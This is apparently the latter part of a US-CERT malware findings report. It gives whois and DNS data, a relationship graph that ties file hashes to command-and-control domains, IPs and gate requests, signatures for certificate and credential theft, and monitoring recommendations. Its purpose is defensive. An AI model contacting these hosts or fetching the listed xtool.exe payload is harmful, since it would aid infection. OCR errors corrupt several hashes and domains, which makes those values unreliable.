% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua 

domain: waterfilter.in.ua 

descr: waterfilter.in.ua 

admin-c: THST-UANIC 

tech-c: THST-UANIC 

status: OK-UNTIL 20170310000000 

nserver: ns1.thehost.com.ua 

nserver: ns2.thehost.com.ua 

nserver: ns3.thehost.com.ua 

mnt-by: THEHOST-MNT-INUA 

mnt-lower: THEHOST-MNT-INUA 

changed: hostmaster@thehost.com.ua 20160224094245 

source: INUA 


% REDIRECT END 
Network Whois record 

Queried whois.ripe.net with "-B 176.114.0.157"... 

% Information related to '176.114.0.0 - 176.114.15.255' 

% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua' 

inetnum: 176.114.0.0 - 176.114.15.255 

netname: THEHOST-NETWORK-3 

country: UA 

org: ORG-FSOV1-RIPE 

admin-c: SA7501-RIPE 

tech-c: SA7501-RIPE 

status: ASSIGNED PI 

mnt-by: RIPE-NCC-END-MNT 

mnt-by: THEHOST-MNT 

mnt-routes: THEHOST-MNT 

mnt-domains: THEHOST-MNT 
created: 2012-04-10T13:34:51Z 

last-modified: 2016-04-14T10:45:42Z 
source: RIPE 

sponsoring-org: ORG-NL64-RIPE 

organisation: ORG-FSOV1-RIPE 

org-name: FOP Sedinkin Olexandr Valeriyovuch 

org-type: other 

address: 08154, Ukraine, Boyarka, Belogorodskaya str., 11a 

e-mail: info@thehost.ua 

abuse-c: AR19055-RIPE 

abuse-mailbox: abuse@thehost.ua 

remarks: - 

remarks: Hosting Provider TheHost 

remarks: - 

remarks: For abuse/spam issues contact abuse@thehost.ua 

remarks: For general/sales questions contact info@thehost.ua 

remarks: For technical support contact support@thehost.ua 

remarks: - 

phone: +380 44 222-9-888 

phone: +7 499 403-36-28 

fax-no: +380 44 222-9-888 ext. 4 

admin-c: SA7501-RIPE 

mnt-ref: THEHOST-MNT 

mnt-by: THEHOST-MNT 

created: 2011-03-01T10:48:14Z 

last-modified: 2015-11-29T21:16:15Z 
source: RIPE 

person: Sedinkin Alexander 

address: Ukraine, Boyarka, Belogorodskaya str., 11a 

phone: +380 44 222-9-888 ext. 213 

address: UKRAINE 

nic-hdl: SA7501-RIPE 
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mnt-by: THEHOST-MNT 

created: 2011-03-01T10:36:18Z 

last-modified: 2015-11-29T21:15:42Z 
source: RIPE 

% Information related to '176.114.0.0/22AS56485' 

route: 176.114.0.0/22 

descr: FOP Sedinkin Olexandr Valeriyovuch 

origin: AS56485 

mnt-by: THEHOST-MNT 

created: 2014-04-26T22:55:50Z 

last-modified: 2014-04-26T22:58:13Z 

source: RIPE 

% This query was served by the RIPE Database Query Service version 1.88 (HEREFORD) 

DNS records 


DNS query for 157.0.114.176.in-addr.arpa failed: TimedOut 
name class type data time to live 

waterfilter.in.ua IN NS ns3.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua IN SOA 

server: ns1.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2015031414 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 86400 


3600s (01:00:00) 


waterfilter.in.ua 

IN 

A 

176.114.0.120 3600s (01:00:00) 

waterfilter.in.ua 

IN 

NS 

nsl .thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua 

IN 

NS 

ns2.thehost.com.ua 3600s (01:00:00) 

waterfilter.in.ua 

IN 

TXT v=spf1 ip4:176.114.0.120 a mx ~ali3600s 

waterfilter.in.ua 

IN 

MX 



preference: 10 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 


(01:00:00) 


waterfilter.in.ua IN MX 

preference: 20 

exchange: mail.waterfilter.in.ua 

3600s (01:00:00) 

157.0.114.176.in-addr.arpa IN PTRwaterfilter.in.ua 3600s (01:00:00) 

0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua3600s (01:00:00) 

0.114.176.in-addr.arpa IN SOA 

server: noc.thehost.com.ua 

email: hostmaster@thehost.com.ua 

serial: 2014044197 

refresh: 10800 

retry: 3600 

expire: 604800 

minimum ttl: 86400 


3600s (01:00:00) 

0.114.176.in-addr.arpa 
0.114.176. in-addr.arpa 
0.114.176. in-addr.arpa 


IN 

NS 

ns3.thehost.com.ua 3600s 

(01:00:00) 

IN 

NS 

ns4.thehost.com.ua 3600s 

(01:00:00) 

IN 

NS 

nsl .thehost.com.ua 3600s 

(01:00:00) 


- end -- 

Relationships 

(I) 176.114.0.157 

(I) 176.114.0.157 


Characterized_By (W) Address lookup 


Related To 


(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 


Relationship Summary 


(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 Related_To (S) Interface for PAS v.3.1.0 

db9749089f559ada4a33f93e (93f51) 
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(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

da9f2804b16b369156e1b629ad3d2aac79326b94 
284e43c7b8355f3db71912b8 (bfcb5) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

20f76ada1721 b61963fa595e3a2006c962253513 
62b79d5d719197c190cd4239 (c3e23) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

7b28b9b85f9943342787bae1c92cab39c01f9d82b 
99eb8628abc638afd9eddaf (38f71) 

(F) 

249ee048142d3d4b5f7ad15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

Related_To 

(F) 

ae67c121c7b81638a7cb655864d574f8a9e55e66 
bcb9a7b01 f0719a05fab7975 (eddfe) 

(S) Interface for PAS v.3.1.0 

Related_To 

(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

da9f2804b16b369156e1b629ad3d2aac79326b94 
284e43c7b8355f3db71912b8 (bfcb5) 

Related_To 

(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

20f76ada1721 b61963fa595e3a2006c962253513 
62b79d5d719197c190cd4239 (c3e23) 

Related_To 

(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

7b28b9b85f9943342787bae1c92cab39c01f9d82b 
99eb8628abc638afd9eddaf (38f71) 

Related_To 

(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

ae67c121c7b81638a7cb655864d574f8a9e55e66 
bcb9a7b01f0719a05fab7975 (eddfe) 

Related_To 

(F) 

249ee048142d3d4b5f7ad 15e8d4b98cf9491 ee68 
db9749089f559ada4a33f93e (93f51) 

(F) 

6fad670ac8febb5909be73c9f6b428179c6a7e942 
94e3e6e358c994500fcce46 (78abd) 

Related_To 

(S) Interface for PAS v.3.0.10 

(F) 

6fad670ac8febb5909be73c9f6b428179c6a7e942 
94e3e6e358c994500fcce46 (78abd) 

Related_To 

(F) 

d285115e97c02063836f1 cf8f91669c114052727c3 
9bf4bd3c062ad5b3509e38 (fc45a) 

(S) Interface for PAS v.3.0.10 

Related_To 

(F) 

6fad670ac8febb5909be73c9f6b428179c6a7e942 
94e3e6e358c994500fcce46 (78abd) 

(F) 

d285115e97c02063836f 1 cf8f91669c114052727c3 
9bf4bd3c062ad5b3509e38 (fc45a) 

Related_To 

(F) 

6fad670ac8febb5909be73c9f6b428179c6a7e942 
94e3e6e358c994500fcce46 (78abd) 

(F) 

55058d3427ce932d8efcbe54dccf97c9a8d 1 e85c7 
67814e34f4b2b6a6b305641 (8f154) 

Connected_To 

(D) private.directinvesting.com 

(D) private.directinvesting.com 

Characterized_By 

(W) Address lookup 

(D) private.directinvesting.com 

Connected_From 

(F) 

55058d3427ce932d8efcbe54dccf97c9a8d1e85c7 
67814e34f4b2b6a6b305641 (8f154) 

(D) private.directinvesting.com 

Related_To 

(H) GET /lexicon/index.c 

(D) private.directinvesting.com 

Related_To 

(H) GET /lexicon/index.c 

(D) private.directinvesting.com 

Related_To 

(H) GET /lexicon/index.c 

(D) private.directinvesting.com 

Related_To 

(1)204.12.12.40 

(1)204.12.12.40 

Characterized_By 

(W) Address lookup 

(1)204.12.12.40 

Related_To 

(D) private.directinvesting.com 

(F) 

9acba7e5f972cdd722541 a23ff314ea81 ac35d5c0 
c758eb708fb6e2cc4f598a0 (ae7e3) 

Connected_To 

(D) cderiearn.com 

(F) 

9acba7e5f972cdd722541 a23ff314ea81 ac35d5c0 
c758eb708fb6e2cc4f598a0 (ae7e3) 

Characterized_By 

(S) digital_cert_steal.bmp 

(D) cderlearn.com 

Characterized_By 

(W) Address lookup 

(D) cderlearn.com 

Connected_From 

(F) 

9acba7e5f972cdd722541a23ff314ea81ac35d5c0 
c758eb708fb6e2cc4f598a0 (ae7e3) 

(D) cderlearn.com 

Related_To 

(H) POST/search.cfm HTT 
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(D) cderlearn.com 

Related_To 

(H) POST /search.cfm HTT 

(D) cderlearn.com 

Related_To 

(1)209.236.67.159 

(1)209.236.67.159 

Characterized_By 

(W) Address lookup 

(1)209.236.67.159 

Related_To 

(D) cderlearn.com 

(S) digital_cert_steal.bmp 

Characterizes 

(F) 

9acba7e5f972cdd722541 a23ff314ea81 ac35d5c0 
c758eb708fb6e2cc4f598a0 (ae7e3) 

(W) Address lookup 

Characterizes 

(D) private.directinvesting.com 

(W) Address lookup 

Characterizes 

(D) cderlearn.com 

(W) Address lookup 

Characterizes 

(D) editprod.waterfilter.in.ua 

(W) Address lookup 

Characterizes 

(D) insta.reduct.ru 

(W) Address lookup 

Characterizes 

(D) one2shoppee.com 

(W) Address lookup 

Characterizes 

(D) ritsoperrol.ru 

(W) Address lookup 

Characterizes 

(D) iittjohnwilhap.ru 

(W) Address lookup 

Characterizes 

(D) wilcarobbe.com 

(H) GET /lexicon/index.c 

Related_To 

(D) private.directinvesting.com 

(H) GET /lexicon/index.c 

Related_To 

(D) private.directinvesting.com 

(H) GET /lexicon/index.c 

Related_To 

(D) private.directinvesting.com 

(H) POST/search.cfm HTT 

Related_To 

(D) cderlearn.com 

(H) POST/search.cfm HTT 

Related_To 

(D) cderlearn.com 

(H) POST /zapoy/gate.php 

Related_To 

(D) wilcarobbe.com 

(H) POST /zapoy/gate.php 

Related_To 

(D) littjohnwilhap.ru 

(P) 80 

Related_To 

(D) wilcarobbe.com 

(P) 80 

Related_To 

(D) littjohnwilhap.ru 

(P) 80 

Related_To 

(D) ritsoperrol.ru 

(H) POST /zapoy/gate.php 

Related_To 

(D) ritsoperrol.ru 

(P) 80 

Related_To 

(D) one2shoppee.com 

(P) 80 

Related_To 

(D) insta.reduct.ru 

(P) 80 

Related_To 

(D) editprod.waterfilter.in.ua 

(W) Address lookup 

Characterizes 

(1) 146.185.161.126 

(W) Address lookup 

Characterizes 

(1) 176.114.0.120 

(W) Address lookup 

Characterizes 

(1)209.236.67.159 

(W) Address lookup 

Characterizes 

(1)204.12.12.40 

(F) 

ac30321be90e85f7eb1 ce7e211 b91fed1 dlfl 5b5d 
3235b9c1e0dad683538cc8e (81f1a) 

Dropped 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(F) 

ac30321be90e85f7eb1 ce7e211 b91 fedl d 1 fl 5b5d 
3235b9c1e0dad683538cc8e (81f1a) 

Characterized_By 

(S) 

ac30321 be90e85f7eb1 ce7e211 b91 fed 1 d 1 fl 5b5d 
3235b9c1e0dad683538cc8e 

(S) 

ac30321be90e85f7eb1 ce7e211 b91 fedl d 1 fl 5b5d 
3235b9c1e0dad683538cc8e 

Characterizes 

(F) 

ac30321 be90e85f7eb 1 ce7e211 b91 fed 1 d 1 fl 5b5d 
3235b9c1e0dad683538cc8e (81f1a) 

(P) 80 

Related_To 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

(W) Address lookup 

Characterizes 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

(W) Address lookup 

Characterizes 

(1) 176.114.0.157 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Characterized_By 

(S) searching_reg_pop3.bmp 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Connected_To 

(D) editprod.waterfilter.in.ua 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Connected_To 

(D) insta.reduct.ru 
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(F) 


9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Connected_To 

(D) one2shoppee.com 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Connected_To 

(D) ritsoperrol.ru 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Connected_To 

(D) littjohnwilhap.ru 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Connected_To 

(D) wilcarobbe.com 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Connected_To 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

Dropped_By 

(F) 

ac30321 be90e85f7eb1 ce7e211 b91 fed 1 d 1 fl 5b5d 
3235b9c1e0dad683538cc8e (81f1a) 

(S) searching_reg_pop3.bmp 

Characterizes 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) wilcarobbe.com 

Characterized_By 

(W) Address lookup 

(D) wilcarobbe.com 

Connected_From 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) wilcarobbe.com 

Related_To 

(H) POST /zapoy/gate.php 

(D) wilcarobbe.com 

Related_To 

(P) 80 

(D) one2shoppee.com 

Characterized_By 

(W) Address lookup 

(D) one2shoppee.com 

Connected_From 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) one2shoppee.com 

Related_To 

(P) 80 

(D) ritsoperrol.ru 

Characterized_By 

(W) Address lookup 

(D) ritsoperrol.ru 

Connected_From 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) ritsoperrol.ru 

Related_To 

(P) 80 

(D) ritsoperrol.ru 

Related_To 

(H) POST /zapoy/gate.php 

(D) littjohnwilhap.ru 

Characterized_By 

(W) Address lookup 

(D) littjohnwilhap.ru 

Connected_From 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) littjohnwilhap.ru 

Related_To 

(H) POST /zapoy/gate.php 

(D) littjohnwilhap.ru 

Related_To 

(P) 80 

(D) insta.reduct.ru 

Characterized_By 

(W) Address lookup 

(D) insta.reduct.ru 

Connected_From 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) insta.reduct.ru 

Related_To 

(P) 80 

(D) insta.reduct.ru 

Related_To 

(1) 146.185.161.126 

(1) 146.185.161.126 

Characterized_By 

(W) Address lookup 

(1) 146.185.161.126 

Related_To 

(D) insta.reduct.ru 

(D) editprod.waterfilter.in.ua 

Characterized_By 

(W) Address lookup 

(D) editprod.waterfilter.in.ua 

Connected_From 

(F) 

9f918fb741 e951 al 0e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) editprod.waterfilter.in.ua 

Related_To 

(P) 80 

(D) editprod.waterfilter.in.ua 

Related_To 

(1) 176.114.0.120 

(1) 176.114.0.120 

Characterized_By 

(W) Address lookup 

(1) 176.114.0.120 

Related_To 

(D) editprod.waterfilter.in.ua 
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(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

Related_To 

(P) 80 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

Characterized_By 

(W) Address lookup 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

Connected_From 

(F) 

9f918fb741 e951 a 10e68ce6874b839aef5a26d604 
86db31e509f8dcaa13acec5 (617ba) 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 

Related_To 

(1) 176.114.0.157 

(1) 176.114.0.157 

Characterized_By 

(W) Address lookup 

(1) 176.114.0.157 

Related_To 

(D) mymodule.waterfilter.in.ua/system 
/logs/xtool.exe 


Mitigation Recommendations 

US-CERT recommends monitoring activity to the following domain(s) and/or IP(s) as a potential indicator of infection: 

• private.directinvesting.com 

• cderlearn.com 

• 204.12.12.40 

• 209.236.67.159 

• 176.114.0.120 

• editprod.waterfilter.in.ua 

• insta.reduct.ru 

• 146.185.161.126 

• one2shoppee.com 

• ritsoperrol.ru 

• littjohnwilhap.ru 

• wilcarobbe.com 

• mymodule.waterfilter.in.ua/system/logs/xtool.exe 

• 176.114.0.157 

US-CERT would like to remind users and administrators of the following best practices to strengthen the security posture of their 
organization's systems: 

• Maintain up-to-date antivirus signatures and engines. 

• Restrict users' ability (permissions) to install and run unwanted software applications. 

• Enforce a strong password policy and implement regular password changes. 

• Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known. 

• Keep operating system patches up-to-date. 

• Enable a personal firewall on agency workstations. 

• Disable unnecessary services on agency workstations and servers. 

• Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the 
file header). 

• Monitor users' web browsing habits; restrict access to sites with unfavorable content. 

• Exercise caution when using removable media (e.g., USB thumbdrives, external drives, CDs, etc.). 

• Scan all software downloaded from the Internet prior to executing. 

• Maintain situational awareness of the latest threats; implement appropriate ACLs. 


Contact Information 


• 1-888-282-0870 

• soc@us-cert.gov (UNCLASS) 

• us-cert@dhs.saov.gov fSIPRNETI 

• us-cert@dhs.ic.aov (JWICS) 

US-CERT continuously strives to improve its products and services. You can help by answering a very short series of questions about this 
product at the following URL: https://forms.us-cert.qov/ncsd-feedback/ 


Document FAQ 


What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In 
most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact 
US-CERT and provide information regarding the level of desired analysis. 

Can I distribute this to other people? This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when 
information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. 
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Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document 
should be directed to the US-CERT Security Operations Center at 1-888-282-0870 or soc@us-cert.gov. 

Can I submit malware to US-CERT? US-CERT encourages you to report any suspicious activity, including cybersecurity incidents, poss ble 
malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on US-CERT's homepage at www.us- 
cert.gov . Malware samples can be submitted via https://malware.us-cert.gov . Alternative submission methods are available by special 
request. 
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